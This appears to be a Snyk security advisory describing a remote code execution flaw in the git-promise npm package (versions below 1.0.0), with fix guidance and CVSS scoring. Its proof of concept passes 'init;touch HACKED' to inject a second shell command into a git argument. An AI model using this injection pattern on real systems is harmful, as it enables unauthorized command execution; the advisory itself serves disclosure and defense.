Remote Code Execution (RCE) Affecting git-promise package, versions <1.0.0


Severity

0.0
high
0
10

    Threat Intelligence

    Exploit Maturity
    Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-GITPROMISE-567476
  • published 26 Apr 2020
  • disclosed 25 Apr 2020
  • credit Michele Romano (mik317)

Introduced: 25 Apr 2020

CVE NOT AVAILABLE CWE-94 Open this link in a new tab

How to fix?

Upgrade git-promise to version 1.0.0 or higher.

Overview

git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The issue occurs because a user input is formatted inside a command that will be executed without any check.

PoC

var git = require("git-promise");
 
git("init;touch HACKED").then(function (branch) {
  console.log(branch); 
});

CVSS Scores

version 3.1
Expand this section

Snyk

7.2 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    High
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High